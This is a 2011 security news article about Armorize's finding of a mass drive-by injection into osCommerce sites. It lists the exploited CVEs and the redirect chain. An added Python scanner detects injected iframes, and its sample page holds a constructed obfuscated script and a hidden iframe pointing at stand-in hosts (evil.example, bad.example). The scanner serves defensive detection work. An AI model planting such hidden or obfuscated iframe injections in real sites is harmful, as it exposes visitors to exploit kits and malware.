Drive-by download infects more than 90,000 sites, Armorize warns

Wayne Huang and his Armorize team have discovered a massive drive-by download that has infected more than 90,000 sites.

Some bullet points sent to me by Joe Franscella, who handles PR for the security vendor:

• Google has indexed over 90,000 infected sites

• The malicious domain is shown in the blog: (do not visit, you may get infected)

• The attack targets osCommerce sites — Open Source eCommerce solutions used by over 249,000 online store owners

The Armorize malware blog includes multiple screen shots and code samples that illustrate the findings. Among other points:

--There's been a mass-scale injection ongoing recently, with the injected iframe pointing to
Google indicates more than 90,000 infected pages (note it's pages, not domains).

--Browser exploits used:

CVE-2010-0840 -- Java Trust

CVE-2010-0188 -- PDF LibTiff

CVE-2010-0886 -- Java SMB

CVE-2006-0003 -- IE MDAC

CVE-2010-1885 -- HCP

1. Infected website is injected with one of several scripts:

2. Browser loads, redirected (302) to

3. Contents of is here on Pastebin, loads JavaScript from

4. JavaScript here on Pastebin, decodes to this, generates iframe pointing to:

5. Contents of is here, redirects to:

6. Contents of is here, decodes to this. This includes multiple browser exploits.

7. After successful exploitation, browser downloads and executes malware from here:
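The chain above is what a store owner has to catch at step 1, on their own pages, before a visitor ever reaches the exploit stage. The scanner below is an added example written for this page; it is not Armorize's code and does not reproduce the injected scripts or domains from their write-up (the sample page, the hostnames and the obfuscated script in it are constructed for the demo). It flags the three injection artifacts the write-up describes: hidden iframes, script tags pulling from hosts you don't control, and inline scripts that assemble an iframe behind String.fromCharCode or unescape.

```python
"""Scan an HTML page for the artifacts of a mass-injection drive-by:
hidden iframes, scripts pulled from untrusted hosts, and inline scripts
that build an iframe behind String.fromCharCode / unescape obfuscation."""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample page. The domains and the injected script are
# hypothetical; they are NOT the ones from the Armorize write-up.
SAMPLE_PAGE = """<html><head>
<script src="/includes/general.js"></script>
<script src="http://stats.example/c.js"></script>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,
104,116,116,112,58,47,47,101,118,105,108,46,101,120,97,109,112,108,101,47,34,32,119,105,100,
116,104,61,49,32,104,101,105,103,104,116,61,49,62,60,47,105,102,114,97,109,101,62))</script>
</head><body>
<iframe src="http://bad.example/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<h1>Welcome to our store</h1>
</body></html>"""

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
SCRIPT_INLINE_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ATTR_RE = re.compile(r"(\w+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def decode_layer(js: str) -> str:
    """Strip one layer of the two cheapest common obfuscations.

    String.fromCharCode(n, n, ...) is replaced by the literal text it
    builds, and unescape("%XX...") is percent-decoded (%uXXXX is not
    handled). The surrounding quotes are dropped, which is fine for
    pattern matching. Real kits nest layers and eval() the result; loop
    this, or run the script in a sandboxed JS engine, for those.
    """
    js = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), js)
    js = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), js)
    return js


def parse_attrs(tag: str) -> dict:
    """Crude attribute parser for a single HTML start tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def is_hidden_iframe(tag: str) -> bool:
    """True for the 0x0 / 1x1 / display:none iframes used to load exploit kits."""
    a = parse_attrs(tag)

    def tiny(v: str) -> bool:
        try:
            return int(v.strip("px ")) <= 1
        except ValueError:
            return False

    style = a.get("style", "").replace(" ", "").lower()
    return (tiny(a.get("width", "")) or tiny(a.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)


def external_host(url: str):
    """Hostname of an absolute http(s) URL, or None for a same-site path."""
    m = re.match(r"https?://([^/]+)", url, re.I)
    return m.group(1).lower() if m else None


@dataclass
class Finding:
    kind: str     # hidden_iframe | external_script | script_iframe
    detail: str   # the URL the injected element points at


def scan_page(page: str, trusted_hosts=frozenset()) -> list:
    """Return the injected elements found in one page (step 1 of the chain)."""
    findings = []
    for m in IFRAME_RE.finditer(page):                      # iframes in the raw HTML
        if is_hidden_iframe(m.group(0)):
            findings.append(Finding("hidden_iframe", parse_attrs(m.group(0)).get("src", "")))
    for m in SCRIPT_SRC_RE.finditer(page):                  # scripts loaded from elsewhere
        host = external_host(m.group(1))
        if host and host not in trusted_hosts:
            findings.append(Finding("external_script", m.group(1)))
    for m in SCRIPT_INLINE_RE.finditer(page):               # iframes an inline script would write
        decoded = decode_layer(m.group(1))
        for im in IFRAME_RE.finditer(decoded):
            findings.append(Finding("script_iframe", parse_attrs(im.group(0)).get("src", "")))
    return findings


if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        print(f"{f.kind:16} {f.detail}")
```

Run it over the exported osCommerce templates and any .php/.html files modified since the last known-good backup; an injected site usually shows the same finding on every page, which is why Armorize counts pages rather than domains. Stripping the tags is not the fix: whatever let the attacker write to the site in the first place has to be closed, and nested or eval()-driven obfuscation needs a sandboxed JS engine rather than this one-layer decoder.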

Thanks to the folks at Armorize for flagging this.

--Bill Brenner

Copyright © 2011 IDG Communications, Inc.
